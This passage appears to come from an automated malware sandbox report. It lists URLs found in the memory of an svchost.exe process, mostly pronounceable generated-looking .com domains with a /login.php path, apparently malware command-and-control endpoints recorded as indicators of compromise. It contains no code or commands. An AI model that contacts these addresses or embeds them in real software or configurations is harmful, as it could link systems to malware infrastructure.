    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803932865.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801875139.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795036771.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydof.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydyc.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygim.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000734E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjic.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjik.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocykem.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymum.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2841193808.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981273362.00000000073B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocypok.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204802047.000000000721D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204593821.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqot.com/login.php
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyryf.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzek.com/login.php
    Source: svchost.exe, 00000001.00000003.2590737779.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzum.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybet.com/login.php
    Source: svchost.exe, 00000001.00000003.2710338113.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2229330427.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2198716545.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204530613.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2202811783.00000000073B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybyf.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycim.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycot.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycyk.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyjom.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505094735.0000000007289000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506962086.000000000728D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofykoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofykyt.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2562078765.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypam.com/login.php
    Source: svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybef.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502330096.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybek.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2622100455.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2624811544.0000000007350000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycit.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2847936839.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygym.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojykom.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2765596647.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766830441.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2764622957.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2761539711.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762452123.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2704766702.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2734882543.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2198716545.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737092972.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymic.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2849525635.000000000BE4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymuk.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojypat.com/login.php
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyqac.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrum.com/login.php
